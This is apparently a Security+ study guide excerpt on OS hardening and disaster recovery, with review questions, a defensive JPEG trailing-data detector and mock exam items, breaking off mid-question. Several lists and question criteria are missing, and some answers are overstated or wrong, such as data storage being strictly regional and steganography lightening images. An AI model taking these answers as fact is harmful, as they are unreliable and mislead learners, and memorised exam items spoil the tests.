IT systems range from desktops and servers used internally to mobile devices, such as laptops, that are also used externally in unsecured environments such as hotels and airports. We therefore need to harden the systems and operating systems so that they are as secure as we can possibly make them. There are various aspects to look at, depending on the functionality of the device and where it is used. Let's look at all of the aspects that we need to take into consideration, starting with a system booting up:

Example: Your company is a multinational company that requires an operating system that can be used by both desktops and laptops that can provide both secure boot and attestation. Which operating system and feature will you choose and why? At the moment, we are using a BIOS to boot up from.

The first thing that we would do is upgrade the BIOS to UEFI so that it can provide a secure boot. The operating system selected would be Windows 10 as it provides a secure boot where the drivers need to be signed to allow boot up. We would then enable Device Guard, which logs the setting of the operating system and checks the integrity of the software and hardware, otherwise the boot sequence fails.

Hardware/firmware security

We need to protect our computer systems against someone stealing the device, re-installing the operating system, and then stealing the data. We need to be able to secure the operating systems and hardware by encrypting them using products such as Microsoft's BitLocker. Let's look at some encryption methods:

Exam tip: FDE needs either a TPM chip on the motherboard or an HSM.

Operating systems

There are various operating systems: Linux is used by the cloud and many network appliances, and Microsoft has Windows 10 for desktops and laptops and Server 2016 for servers. There is also Android for many phones, as well as Apple's iOS for iPhones and iPads. Let's look at different uses of these:

Securing IT systems

It is important that we secure all of our IT systems against attacks. Let's now look at hardening the operating system to reduce the attack surface. Let's look at each of these in turn:

Exam tip: When receiving a new IT system or IoT device, you need to change the default administrator account and password.

Peripherals

Once we have looked at the security of the IT systems, we need to look at the vulnerabilities of the peripherals to see where they are vulnerable:

Importance of secure staging deployment concepts

Before applications can be used in a production environment, we must ensure that they are as secure as possible to mitigate the risk of being attacked by an outside agency. We are going to look at three different aspects: sandboxing, environment, and secure baseline. Let's look at these in turn:


Figure 1: Environment

Troubleshooting common security issues

On a day-to-day basis, the security team will come across some of the following issues, and we will look at how they can mitigate the risk caused by each of them:


Figure 2: Trusted Root Certification Authorities

Exam tip: If a certificate does not work, ensure that it is valid and add it to the Trusted Root Certification Authorities.

Misconfigured devices

It is vital that all network appliances are properly configured or the company could be vulnerable to attack. Let's look at some of the appliances for this:

Personnel issues

Most cybercrime is successful due to the actions of people that work for the company, and therefore we need to set up policies to mitigate against any attack. Let's look at some of the personnel security issues facing the security team:

Exam tip: Accessing the company network externally without a secure connection or VPN is a policy violation.

Software issues

Software is no longer only run locally, as some of it is now run from or downloaded from the internet. Therefore, the security team needs to be aware of unauthorized software being installed on their IT systems. Let's look at some of the problems that are posed:

Exam tip: Someone downloading unauthorized software will increase bandwidth usage and reduce disk space.

Disaster recovery and continuity of operations concepts

It is important that, if a company suffers a disaster, it can be up and running again as soon as possible. Disasters range from natural disasters such as hurricanes or floods to hardware failure, malicious insider attack, or accidental deletion of data. The main aim of a disaster recovery plan is to get the company back up and running so that it can generate income. Let's look at the different aspects of disaster recovery:

Exam tip: Cloud providers and multinational companies can only store data within the region in which it was created.

Exam tip: If we don't hold a post-incident meeting, we will not prevent the incident from recurring. This is known as lessons learned.

Review questions

  1. What type of BIOS needs to be implemented if we want an operating system to be able to secure boot?

  2. When a Windows 10 operating systems secure boots, what checks does it carry out relating to drivers?

  3. What type of trust model is being used if we use Full Disk Encryption?

  4. If my laptop is going to use Full Disk Encryption, what type of chip do I need to have installed on the motherboard?

  5. Why would you need to vet your supply chain?

  6. Where does EMI come from and how can it affect your computer systems?

  7. What is the difference between EMI and EMP?

  8. What can a company install to reduce the threat of EMP?

  9. What is the purpose of a Kiosk?

  10. Describe a trusted operating system.

  11. Name two mobile operating systems and where they are used.

  12. When we receive a new IT system or IoT device, what is the first step we need to carry out?

  13. Why would you disable unnecessary ports and services?

  14. What is the purpose of using STIG?

  15. How can I protect an external storage device against data theft?

  16. What should I do to reduce the attack surface on a digital camera?

  17. What is the best way to test a bespoke application before moving it into production?

  18. What are the four stages when designing a new application?

  19. What is an example of access violation?

  20. If I purchase a new X509 certificate and it does not work, what two actions should I carry out?

  21. How can I tell if someone is stealing data using steganography?

  22. What can we do to prevent someone stealing PII or sensitive data?

  23. What is the most common authentication method that can be incorrectly configured?

  24. How can we prevent someone from stealing a laptop and a tablet?

  25. If a remote user is accessing the company's network externally and decides not to use a VPN, what is he guilty of?

  26. What information should I not post on social media, such as Twitter or Facebook?

  27. What are two symptoms that someone is downloading unauthorized software?

  28. Give an example of license compliance violation.

  29. What is the fastest site to implement during disaster recovery?

  30. If my company is a multinational corporation, can I store New York data in London, in case the New York site falls over?

  31. If my hot site is over 200 miles away, what should I consider to make recovery much faster?

  32. What is a theory-based or paper-based disaster recovery exercise?

  33. What is the purpose of an after-action report?

  34. What is the cheapest disaster recovery site but the slowest to get back up and running?

  35. What is the difference between geotracking and geotagging?


Answers and explanations

  1. You would implement the Unified Extensible Firmware Interface (UEFI) as it is more secure and has the ability to secure boot an operating system.

  2. When a Windows 10 operating system secure boots, it checks that all of the drivers are digitally signed.

  3. A hardware root of trust is used by FDE.

  4. Full Disk Encryption needs a TPM chip on the motherboard or a portable HSM.

  5. You need to vet people working for companies in your supply chain and also ensure that they are large enough to supply goods and services.

  6. Electromagnetic Interference (EMI) coming from motors, fluorescent lights, and radio frequency interference affects a system's performance and could cause jamming that prevents IT systems from working.

  7. EMI interferes with IT systems, but EMP destroys them.

  8. A company installs a UPS or a surge protector to reduce the threat of EMP.

  9. A Kiosk is a computer in a reception area or foyer that needs to be tied down so that only the displayed information about the building is available.

  10. A trusted operating system is a secure system normally used by the military where it has multiple layers of security as it is used to access classified data. It is tied down tightly and changes to the operating system are controlled.

  11. Apple iOS is an operating system for mobile devices such as the iPhone and the iPad, and Android is used by all other mobile telephones, such as Samsung.

  12. The first stage when we receive a new IT system or IoT device is to change the default administrator account and password.

  13. You disable unnecessary ports and services to harden the operating system and reduce the attack surface.

  14. A Security Technical Implementation Guide (STIG) is used by the military to ensure that operating systems are tied down tightly.

  15. You should use FDE to protect an external storage device against data theft.

  16. You should remove the memory card to reduce the attack surface on a digital camera.

  17. You should use sandboxing to test a bespoke application before moving it into production.

  18. The four stages when designing a new application are developing, testing, staging, and then production.

  19. Access violation is where a user is accessing data that they should not be able to see.

  20. You would first of all check that the certificate is valid and then check if it has been added to the Trusted Root Certification Authorities.

  21. A file would be larger and an image would be lighter in color.

  22. We can use DLP to prevent someone stealing PII or sensitive data.

  23. The most common authentication method that can be incorrectly configured is a username and password.

  24. We can use cable locks to prevent someone from stealing a laptop and a tablet.

  25. They are guilty of policy violation.

  26. Company information should never be posted on social media, such as Twitter or Facebook.

  27. Your internet bandwidth usage has increased and your local disk space has been reduced.

  28. License compliance violation is where you steal the license to an application and then install it on your desktop without consent.

  29. The fastest disaster recovery site is the hot site.

  30. No, data can only be stored regionally; you would need a backup site in the USA.

  31. You should consider moving your hot site to the cloud.

  32. A tabletop exercise is a theory-based or paper-based disaster recovery exercise.

  33. An after-action report looks at how an incident happened and puts measures in place to prevent recurrence, sometimes called lessons learned.

  34. The cheapest disaster recovery site is the cold site; it is the slowest to get back up and running as it has power and water and nothing else.

  35. Geotracking can tell you the location of a mobile device, and geotagging puts the location on a picture along with when it was taken.
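The steganography answer above says that a file carrying hidden data is often larger than it should be. One concrete way to check that for JPEG files, going beyond what the text describes, is to walk the file's marker structure to find where the image legitimately ends (the EOI marker) and count the bytes that follow it. The Python example below is added here and is not from the book or its author; the JPEG bytes it builds are a constructed minimal marker sequence, not a decodable picture, and the hidden payload is invented for the demonstration. It also shows why simply searching for the last FF D9 in the file is unreliable: the constructed payload contains one.

```python
import struct

SOI = b"\xff\xd8"  # Start Of Image marker
EOI = b"\xff\xd9"  # End Of Image marker

# Constructed payload for the demonstration. It deliberately contains an FF D9 pair
# so that a naive "find the last EOI" search stops at the wrong place.
HIDDEN_PAYLOAD = b"hidden: \xff\xd9 still hidden"


def find_eoi_offset(data):
    """Walk the JPEG marker structure and return the offset just past the EOI marker.

    Segments after SOI are FF xx followed by a 2-byte big-endian length, except for
    standalone markers (TEM, RSTn, SOI, EOI) that carry no length. After a Start Of
    Scan (SOS) segment the entropy-coded data runs until the next real marker; inside
    that data an FF byte is always followed by 00 (byte stuffing) or by D0-D7 (restart
    markers), so anything else is a genuine marker.
    """
    if data[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI marker")
    i, n = 2, len(data)
    while i < n:
        if data[i] != 0xFF:
            raise ValueError("expected a marker at offset %d" % i)
        while i < n and data[i] == 0xFF:  # skip fill bytes
            i += 1
        if i >= n:
            raise ValueError("truncated file")
        marker = data[i]
        i += 1
        if marker == 0xD9:  # EOI: the image legitimately ends here
            return i
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:  # standalone markers
            continue
        if i + 2 > n:
            raise ValueError("truncated segment header")
        seglen = struct.unpack(">H", data[i:i + 2])[0]  # length includes the 2 length bytes
        i += seglen
        if marker == 0xDA:  # SOS: skip entropy-coded data up to the next real marker
            while i + 1 < n:
                nxt = data[i + 1]
                if data[i] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                i += 1
    raise ValueError("no EOI marker found")


def trailing_bytes(data):
    """Number of bytes after the image's EOI marker; non-zero means appended data."""
    return len(data) - find_eoi_offset(data)


def naive_trailing_bytes(data):
    """The tempting shortcut: bytes after the last FF D9 in the file. Fooled by the payload."""
    return len(data) - (data.rfind(EOI) + 2)


def build_sample_jpeg():
    """Constructed minimal JPEG marker sequence (APP0 + SOS + a little scan data).

    It is structurally valid for the walker above but is not a decodable picture.
    """
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", 2 + len(jfif)) + jfif
    sos_body = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + struct.pack(">H", 2 + len(sos_body)) + sos_body
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # includes a stuffed FF 00 and an RST0 marker
    return SOI + app0 + sos + scan + EOI


if __name__ == "__main__":
    clean = build_sample_jpeg()
    suspect = clean + HIDDEN_PAYLOAD
    print("clean file, bytes after EOI:", trailing_bytes(clean))
    print("suspect file, bytes after EOI:", trailing_bytes(suspect))
    print("naive check on suspect file:", naive_trailing_bytes(suspect))
```

Trailing bytes are only one indicator: some legitimate software appends metadata after EOI, and data hidden in the pixel values themselves (the "faded image" case) leaves the file structurally clean, so a non-zero count is a reason to look closer, not proof of exfiltration.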

Mock Exam 1

  1. What type of attack is a padding oracle on downgraded legacy encryption? Choose two options from the following list:

A. IV attack

B. Replay attack

C. Man-in-the-middle attack

D. TLS 1.0 with electronic code book

E. SSL 3.0 with cipher block chaining

  2. You are the security administrator for the British secret service. What type of access method will you use for secret and top-secret data?

A. You will use DAC, with the owner of the data giving access

B. You will use DAC, with the custodian of the data giving access

C. You will use DAC, with the security administrator giving access

D. You will use MAC, with the security administrator giving access


  3. Your company wants to encrypt the DNS traffic by using DNSSEC. Once you have signed the zone, what records are created for each host?

A. CNAME

B. AAAA

C. RRSIG

D. MX

E. PTR

  4. You are a security administrator. A user called Ben is having a discussion with one of his colleagues. They have four choices for two-factor authentication. They have asked for your advice as to which of the following is a two-factor authentication method. Select the best answer:

A. Smart card

B. Password and PIN

C. Passphrase and username

D. Retina and fingerprint scan

  5. Two separate CAs need to work together on a joint venture. What can they implement so that certificates can be used for cross certification?

A. Bridge trust model

B. Certificate pinning

C. Certificate stapling

D. Wildcard certificates



  6. John goes to a sports website and gets the following error:

THIS WEBSITE CANNOT BE TRUSTED.

What two actions does the website administrator need to take to resolve this error?

A. Ask the key escrow to store his private key

B. Ensure that the website uses a valid SAN certificate

C. Update the root certificate in the client computer certificate store

D. Verify that the certificate on the server has not expired

  7. A security administrator discovers that an attacker used a compromised host as a platform for launching attacks deeper into a company's network. What terminology best describes the use of the compromised host?

A. Brute force

B. Active reconnaissance

C. Pivoting

D. Passing point

  8. Mary is managing the company's wireless network, which will use WPA2-PSK. What kind of encryption is most likely to be used?

A. SHA-1

B. AES

C. MD5

D. DES


  9. Who is responsible for setting permissions when using a mandatory access control (MAC) model?

A. Owner

B. Manager

C. Administrator

D. User

  10. Company A is due to upgrade all of its IT systems, and has been investigating the possibility of moving to the cloud, as there is no capital expenditure because the CSP provides the hardware. Company A would still like to control the IT systems in the cloud. Which cloud model would best serve company A's needs?

A. Software as a Service (SaaS)

B. Infrastructure as a Service (IaaS)

C. Monitoring as a Service (MaaS)

D. Platform as a Service (PaaS)

  11. You are the security administrator and the IT director has tasked you with collecting the volatile memory on Server 1, as it is currently under a cyberattack. Which of the following are the two best forms of volatile memory to collect?

A. Secure boot

B. Swap/page file

C. USB flash drive

D. ROM

E. RAM


  12. Bill and Ben are going to encrypt data using asymmetric encryption, which uses public and private keys. What is the first step they need to take?

A. Exchange public keys

B. Exchange private keys

C. Exchange digital signatures

D. Exchange telephone numbers

  13. At what stage in the SDLC are computer systems no longer supported by the original vendor?

A. Sandboxing

B. End-of-life systems

C. Resource exhaustion

D. System sprawl

  14. Company A has just developed a bespoke system for booking airline tickets. What is it called if a freelance coding specialist tests it for security flaws?

A. Code review

B. Static code review

C. Regression testing

D. Dynamic code review

  15. You are the security administrator for a company that has just replaced two file servers, and you have been tasked with the disposal of the hard drives that are used to store top-secret data. What is the best solution?

A. Hashing

B. Degauss

C. Low-level formatting

D. Shredding



  16. You are the security administrator for an airline company whose systems suffered a loss of availability last month. Which of the following attacks would most likely affect the availability of your IT systems?

A. Spear phishing

B. Replay

C. Man-in-the-middle (MITM)

D. DoS

  17. You are a network administrator setting up a L2TP/IPSec VPN tunnel, as your company needs to move a large amount of encrypted data between a branch office and the head office. Why is Diffie Hellman used for an IKE phase before the data is forwarded via symmetric encryption?

A. It is a symmetric encryption technique that protects keys

B. It is a hashing technique that protects keys

C. It is an ephemeral technique that protects keys

D. It is an asymmetric technique that protects keys by setting up a secure channel

  18. You are a lecturer in a college and you need to deliver a session on salting passwords. What are the two main reasons you would salt passwords?

A. To prevent brute force attacks

B. To make access to the password slower

C. To prevent duplicate passwords being stored

D. To stop simple passwords from being used


  19. Which of the following methods of authentication are known as two-factor authentication?

A. PIN and passphrase

B. Mastercard and PIN

C. Username and password

D. Retina and facial recognition

  20. During a forensic investigation, the judge decrees that any data that is investigated should remain in its original form of integrity. Which of the following are used for the integrity of data? Choose two from the following list:

A. MD5

B. AES

C. SHA-1

D. DES

  21. Company A has suffered a distributed denial-of-service attack, and the company has decided that their RPO should be set at four hours. The directors are holding a board meeting to discuss the progress that is being made. During this meeting, the IT manager has mentioned the RTO, and the CEO looks confused. How can you explain the meaning of the RTO to the CEO?

A. Acceptable downtime

B. Return to operational state

C. Measure of reliability

D. Average time to repair

  22. The following is a list of different controls. Which of these are physical security controls?

A. Change management

B. Antivirus software

C. Cable locks

D. Firewall rules

E. Iris scanner

  23. The security team has identified an unknown vulnerability and isolated it. What technique is the best to use to investigate and test it?

A. Steganography

B. Fuzzing

C. Sandboxing

D. Containerization

  24. What is it called when a user has exploited an IT system so that he/she has obtained access to all files on the file server?

A. Remote exploit

B. Zero-day exploit

C. Privilege escalation

D. Pivoting

  25. You are the security administrator for your company, and the IT manager has asked you to brief him on XML authentication methods. Which of the following should you tell him uses XML-based authentication? Select all that apply:

A. TOTP

B. Federation services

C. Smart card


D. SSO

E. SOAP

F. SAML

  26. There is a group of certificates in a folder, and you need to identify which certificate uses the Privacy Enhanced Mail (PEM) format. Which of the following is the best choice to make?

A. PFX

B. CER

C. BASE 64

D. P12

  27. Three different companies want to develop an application for which they will share the cost of developing the resources and future running costs. Which cloud model best describes this?

A. Public cloud

B. Software as a Service (SaaS)

C. Private cloud

D. Platform as a Service (PaaS)

E. Infrastructure as a Service (IaaS)

F. Community cloud

  28. What type of keys does a key escrow manage?

A. Public

B. Session

C. Shared

D. Private


  29. Which of the following is an email-based attack on all members of the sales team?

A. Phishing

B. Vishing

C. Spear phishing

D. Pharming

  30. An attacker tries to target a high-level executive, but, unfortunately, has to leave a voicemail as the executive did not answer the telephone. What was the intended attack and what attack will eventually be used? Select all that apply from the following list:

A. Whaling

B. Vishing

C. Phishing

D. Spear phishing

  31. An auditor has been investigating the theft of money from a charity. He has discovered that the finance assistant has been embezzling money, as the finance assistant was the only person who dealt with finance by receiving donations and paying all of the bills. Which of the following is the best option that the auditor should recommend to reduce the risk of this happening again?

A. Hashing

B. Job rotation

C. Separation of duties

D. Mandatory vacations

E. Encryption


  32. You are a security administrator and you have moved departments. You are now working with the certificate authority and training Mary, who is a new intern. Mary has asked you what the certificate object identifier (OID) consists of. What should you tell her?

A. Certificate-signing request

B. Certificate pinning

C. Certificate stapling

D. Certificate serial number

  33. You are the operational manager for a multinational corporation, and you are writing a policy in which you mention the RPO. Which of the following is the closest to the definition of an RPO?

A. Acceptable downtime

B. Return to operational state

C. A measure of the system reliability

D. Average time to repair

  34. You are carrying out annual training for your company and need to put a PowerPoint slide together on the symptoms of a backdoor virus. Which three points should you include in the slide? Each provides part of the explanation of a backdoor virus:

A. Programs will not open at all, even though you are clicking many times

B. You must click on several items

C. They can be included in an email attachment

D. Files open quicker than before

E. You can only get infected through a link on a web page


  35. You are a security administrator and need to set up a new wireless access point so that it is not backward compatible with legacy systems, as these may be vulnerable to attack, and it must be the strongest encryption that you can use. Which is the best solution that meets your needs?

A. WPA2 PSK

B. WPA TKIP

C. WPA2 TKIP

D. WPA2 CCMP

  36. Which of the following commands can be used to create a buffer overflow? Choose all that apply:

A. var char

B. strcpy

C. var data

D. strcat

  37. James has raised a ticket with the IT help desk; he has been tampering with the settings on his computer and he can no longer access the internet. The helpdesk technicians have checked the configuration on his desktop and the settings are the same as everyone else's. Suddenly, three other people have also reported that they also cannot connect to the internet. Which network device should be checked first?

A. Switch

B. Router

C. Hub

D. Repeater

  38. Which of the following is a secure wireless protocol that uses TLS?

A. NTLM

B. PAP

C. EAP

D. AES

  39. You are the security administrator for a multinational corporation, and the development team has asked your advice as to how to best prevent SQL-injection, integer-overflow, and buffer-overflow attacks. Which of the following should you advise them to use?

A. Input validation

B. A host-based firewall with advanced security

C. Strcpy

D. Hashing

  40. Your company is opening up a new data center in Galway, Ireland, where you have installed the server farm, and now a construction company has come in to put a six-foot mantrap in the entrance. What best describes the two main reasons why this mantrap is being installed?

A. To prevent theft

B. To prevent tailgating

C. To prevent unauthorized personnel gaining access to the data center

D. To allow faster access to the facility

  41. Which of the following devices can prevent unauthorized access to the network and prevent attacks from unknown sources?

A. Router

B. Load balancer

C. Web security gateway

D. UTM


  42. The Internet of Things (IoT) is a concept that has recently taken off. Which of the following devices fall under this category? Select all that apply:

A. ATM

B. Banking system

C. Smart TV

D. Refrigerator

E. Router

F. Wearable technology

  43. Which feature of DNS will help to balance a load without needing to install a network load balancer, or, when coupled with a load balancer, makes it more dynamic?

A. DNS CNAME

B. DNSSEC

C. DNS round robin

D. DNS SRV records

  44. What is the benefit of certificate pinning?

A. It prevents a certificate-signing request from a nonadministrator

B. It is used by a web server, and it bypasses the CRL for faster authentication

C. It stops people from spoofing, issuing certificates, or compromising your CA

D. It is used for cross certification between two separate root CAs

  45. An auditor has just finished a risk assessment of the company, and he has recommended that we need to mitigate some of our risks. Which of the following are examples of risk mitigation? Select all that apply:

A. Turning off host-based firewalls on laptops

B. Installing antivirus on a new laptop


C. Insuring your car against fire and theft

D. Outsourcing your IT to another company

E. Deciding not to jump into the Grand Canyon

  46. A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following will you choose?

A. L2TP/IPSec

B. SSL VPN

C. PPTP VPN

D. IKEv2 VPN

  47. You are the Active Directory administrator and you have been training new interns on the Kerberos ticket-granting ticket session. One of the interns has asked about the relationship between a service ticket and session ticket used by Kerberos authentication. Which of the following is the best description?

A. The user exchanges his service ticket with the server's session ticket for mutual authentication and single sign on

B. The service key is unencrypted and is matched with the value in the session ticket

C. The user shows the server his session ticket; and the server sends him a service ticket

D. The user shows the server his service ticket; and the server sends him a session ticket to keep

  48. Your company has a guest wireless network that can be used by visitors during the day, the sales staff in the evening, and the customer-service staff at lunchtime.

They set up a captive portal that fulfills the following criteria:

Guests do not need to authenticate



How will you set up your captive portal? Select three answers from the following list, where each answer provides part of the solution:

A. WEP 40 bit key

B. WPA2 TKIP

C. WPA-TKIP

D. Open-system authentication

E. WPA2 CCMP

F. WPS

  49. You are a security administrator, and the IT team has been using RSA for the encryption of all of its data, but has found that it is very slow. Which of the following should the security administrator recommend to improve the speed of the encryption?

A. Asymmetric encryption using DES

B. Asymmetric encryption using Diffie Hellman

C. Symmetric encryption

D. Running a vulnerability scan to find a better solution

  50. Robert, who is an intern, has been assigned to the security team. A user has called him to ask who signs the X509 certificates. Which one of the following should Robert give as an answer?

A. CRL

B. Key escrow

C. CSR

D. CA

Mock Exam 2

  1. You are the security administrator for a large multinational corporation, and you have used a black box penetration tester to find vulnerabilities in your company and exploit them as far as you can. During the penetration test, it was found that there were some vulnerabilities in your Windows 10 desktop operating system. There were no vulnerabilities in any of your Linux or Unix systems. Which of the following reasons best describes why the penetration tester was successful with the Windows 10 machines, but not with the Linux or Unix?

A. Linux and Unix are more secure than Windows 10

B. The penetration tester did not attempt to exploit the Linux/Unix machines

C. The Linux and Unix operating systems never have any vulnerabilities

D. The operating systems' attack vectors are very different

  2. You are a security administrator and you wish to implement an encrypted method of authentication for your wireless network. Which of the following protocols is the most secure for your wireless network?

A. PAP

B. WPA2-PSK

C. EAP-TLS

D. PEAP


  3. You are designing the network topology for a new company that is rapidly expanding from a one-premise company with 20 users to a medium-sized company with 300 users. The company tells you that it was subjected to a DDoS attack last year that took the company down for over a day. In your network design, they don't want to implement a DMZ; therefore, the traffic will be coming direct from the internet. How do you propose to best mitigate against future DDoS attacks? Select two answers from the following list; each is part of the solution:

A. Install a stateless firewall on the edge of your network to prevent incoming traffic

B. Install a stateful firewall on the edge of your network to prevent incoming traffic

C. Install a NIDS in your network as an additional layer of protection

D. Install a NIPS in your network as an additional layer of protection

E. Install an inline NIPS in your network as an additional layer of protection

  4. You work on the cyber security team of a large multinational corporation, and you have been alerted to an attack on the web server inside your DMZ that is used for selling your products on the internet. You can see by running netstat that you have an unknown active connection. What should be the first step you take when investigating this incident?

A. Isolate the web server by disconnecting it from the network to prevent further damage

B. Disconnect all external active connections to ensure that any attack is stopped

C. Run a packet sniffer to capture the network traffic to identify the attacker

D. Take a screenshot of the damage done to the website and report the incident to the police


  1. I need to purchase a certificate that I can install on five mail servers. Which one should I purchase?

A. PEM certificate

B. Wildcard certificate

C. Subject Alternative Name (SAN) certificate

D. Root certificate

  1. You are the manager of a large IT company and it is your duty to authorize the administrative controls. Which of the following are actions that you would normally authorize? Select all that apply:

A. Collecting an ID badge

B. Creating an IT security policy

C. Purchasing a cable lock

D. Creating a new firewall rule

  1. You are the operational manager for a financial company that has just suffered a disaster. Which of the following sites will you choose to be fully operational in the least amount of time?

A. Cold site

B. Warm site

C. Hot site

D. Campus site


  1. The serious crimes agency has just taken control of a laptop belonging to a well-known criminal that they have been trying to track down for the last 20 years. They want to ensure that everything is done by the book and no errors are made. What is the first step in their forensic investigation, prior to starting the chain of custody?

A. Making a system image of the laptop

B. Placing it in a polythene bag and sealing it

C. Hashing the data so that data integrity is assured

D. Asking for proof of ownership of the laptop

  1. If an attacker is looking for information about the software versions that you use on your network, which of the following tools could he/she use? Select all that apply:

A. Protocol analyzer

B. Port scanning

C. Network mapper

D. Baseline analyzer

  1. Footage of people relaxing in their homes started appearing on the internet without the knowledge of the people being filmed. The people being filmed were warned by relatives and coworkers, resulting in an enquiry being launched by the police. Initial evidence reported a similarity in that they had all recently purchased IoT devices, such as health monitors, baby monitors, smart TVs and refrigerators. Which of the following best describes why the attacks were successful?

A. The devices' default configurations were not changed

B. Their houses had been broken into and hidden cameras were installed

C. Their wireless networks were broadcasting beyond the boundaries of their homes

D. The manufacturers of the devices installed hidden devices allowing them to film


  1. You are the network administrator for an IT training company that has over 20 training rooms that are all networked together in their Miami office. Your corporate admin team could not access the internet last week as they were getting their IP settings from one of the training room's DHCP servers. The training manager has asked you to separate the corporate admin machines into their own network with a different IP range from the training rooms. What is the most secure way of implementing this? Select the best option from the following:

A. Create a VLAN on the switch and put the corporate admin team in the VLAN

B. Install a router in the LAN and place the corporate admin team in the new subnet

C. Create a NAT from the firewall and put the corporate machines in that network

D. Install a proxy server

  1. Your organization has many different ways of connecting to your network, ranging from VPN and RAS to 802.1x authentication switches. You need to implement a centrally managed authentication system that will log periods of access. Select the two most suitable methods of authentication from the following:

A. PAP

B. TACACS+

C. NTLM

D. RADIUS

  1. From a security perspective, what is the major benefit of using imaging technology, such as Microsoft WDS server or Symantec Ghost, to image desktop computers and laptops that are being rolled out?

A. It provides a consistent baseline for all new machines

B. It ensures that all machines are patched

C. It reduces the number of vulnerabilities

D. It allows a nontechnical person to roll out the images

  1. A company that is allowing people to access their internet application wants the people who log into the application to use an account managed by someone else. An example of such an arrangement is using their Facebook account with a technology called OpenID Connect. Which of the following protocols is this based on? Select the best choice:

A. Kerberos

B. SAML

C. OAuth 2.0

D. Federation services

  1. You are the security administrator for a medium-sized company that needs to enforce a much stricter password policy via group policy. The aims of this policy are to do the following:

Select the following options that you will need to use to fulfill all of these goals:

A. Enforce password history

B. Minimum password length

C. Passwords must meet complexity requirements

D. Minimum password age

E. Maximum password length

  1. You provide a service for people who have recently fulfilled their contract with their mobile phone provider to unlock their phone and then install third-party applications on it. They will then no longer be tied to using the mobile phone vendor's app store. Which of the following techniques will you use to achieve this? Select all that apply:

A. Tethering

B. Sideloading

C. Slipstreaming

D. Jailbreaking or rooting

E. Degaussing

  1. You are the security administrator of a multinational company that has recently prevented brute force attacks by using account lockout settings with a low value using group policy. The CEO of the company has now dictated that the company will no longer use account lockout settings as he read an article about it and got the wrong impression. Facing this dilemma, how can you make it more difficult for a brute force attack to be successful?

A. Obfuscation

B. PBKDF2

C. XOR

D. bcrypt

  1. You want to join a wireless network using a password. Which of the following wireless features would be most appropriate to achieve this objective?

A. WPA2-Enterprise

B. WPA2-TKIP

C. WPS

D. WPA2-PSK

E. WPA2-CCMP

  1. What is the one main purpose of a network intrusion detection system (NIDS)? Select the most appropriate option:

A. Identifies vulnerabilities

B. Identifies new network hosts

C. Identifies viruses

D. Identifies new web servers

  1. A web server was the victim of an integer overflow attack. How could this be prevented in the future?

A. Install a proxy server

B. Install an SQL injection

C. Input validation on forms

D. Install a web application firewall

  1. You have recently set up a new virtual network with over 1,000 guest machines. One of the hosts is running out of resources, such as memory and disk space. Which of the following best describes what is happening?

A. Virtual machine escape

B. End of system lifespan

C. System sprawl

D. Poor setup

  1. You are the system administrator for a multinational company that wants to implement two-factor authentication. At present, you are using facial recognition as the method of access. Which of the following would allow you to obtain two-factor authentication? Select all that apply:

A. Palm reader

B. Signature verification

C. Thumb scanner

D. Gait

E. Iris scanner

  1. The security auditor has just visited your company and is recommending that change management reduces the risks from the unknown vulnerabilities of any new software introduced into the company. What will the auditor recommend to reduce the risk when you first evaluate the software? Select the best two practices to adopt from the following list:

A. Jailbreaking

B. Sandboxing

C. Bluesnarfing

D. Chroot jail

E. Fuzzing

  1. You are the security administrator for a multinational corporation. You recently detected and thwarted an attack on your network when someone hacked into your network and took full control of one of the hosts. What type of attack best describes the attack you stopped?

A. Man-in-the-middle attack

B. Replay attack

C. Packet filtering

D. Remote exploit

  1. You are the security administrator for a multinational corporation and you recently carried out a security audit. Following the audit, you told the server administrators to disable NTLM on all servers. Which of the following types of attack best describes why you have taken this action?

A. It will improve the server's performance

B. To prevent a man-in-the-middle attack

C. To prevent a pass-the-hash attack

D. To prevent a poodle attack

  1. The political adviser to the Prime Minister of the United Kingdom has returned from the two months of summer break that all staff are entitled to. He has applied for an immediate transfer to another department, stating that his health is bad and the job was far too intense. When his replacement arrives, he finds that, during the summer recess, the political adviser has shredded all documents relating to a political inquiry that has involved his cousin. The police are immediately called in and say that they cannot prosecute the political adviser due to lack of evidence. What precautions could the Houses of Parliament security team take to prevent further events such as this from happening in the future?

A. Create a change-management document to ensure that the receptionists are more vigilant to people coming in out of hours

B. Enforce time-of-day restrictions so that nobody can access the IT systems during summer breaks

C. Enforce separation of duties to ensure that any document that is destroyed has been witnessed by a second person

D. Enforce mandatory vacations to prevent his coming in during the recess

  1. You work in the forensics team of a very large multinational corporation, where an attack has happened across three different sites in two different countries. You have been collecting the following log files from these locations:

What is the first action that you need to take when collating these logs?

A. Apply time normalization to these logs

B. Copy them into a worm drive so that they cannot be tampered with

C. Sort out the sequence of events by site

D. Raise chain of custody documentation for these logs

  1. You are an Active Directory administrator and have been having problems with the time synchronization that is used by the Kerberos authentication protocol. Consequently, you have now contacted a third party to provide your time synchronization. They use Stratum network time protocol (NTP) servers. What is the most secure method of setting up a Stratum server for time synchronization?

A. The servers should connect to an internal Stratum 1 NTP server

B. The servers should connect to an internal Stratum 2 NTP server

C. The servers should connect to an internal Stratum 0 NTP server

D. The servers should connect to an external Stratum 0 NTP server

  1. You are the network administrator for a company that runs an Active Directory domain environment where the system administrator is failing to keep you updated when new hosts are added to the network. You now decide that you will use your networking tools to:

Which of the following network-based tools provide the information that you require? Select the tools that you are most likely to use:

A. Protocol scanner

B. Microsoft baseline analyser

C. Nmap

D. Penetration testing

  1. You are working for the serious crimes unit of the United Nations and have been given a laptop to investigate. You need to ensure that the evidence you are investigating has not been tampered with during your investigation. How are you going to prove this to the court when it is time to present your findings? Which of the following techniques will you adopt to best prove this? Select all that apply:

A. MD5

B. 3DES

C. SHA1

D. Blowfish

  1. You are the security administrator for a multinational corporation that has an Active Directory domain. What type of attack uses HTML tags with JavaScript inserted between the <script> and </script> tags?

A. Cross-site scripting

B. Man-in-the-middle

C. Cross-site forgery attack

D. SQL injection

  1. You are a system administrator working for a multinational company that has a Windows domain and is using an active-passive model. Which of the following are the best reasons why your company would have adopted this model?

A. It provides vendor diversity
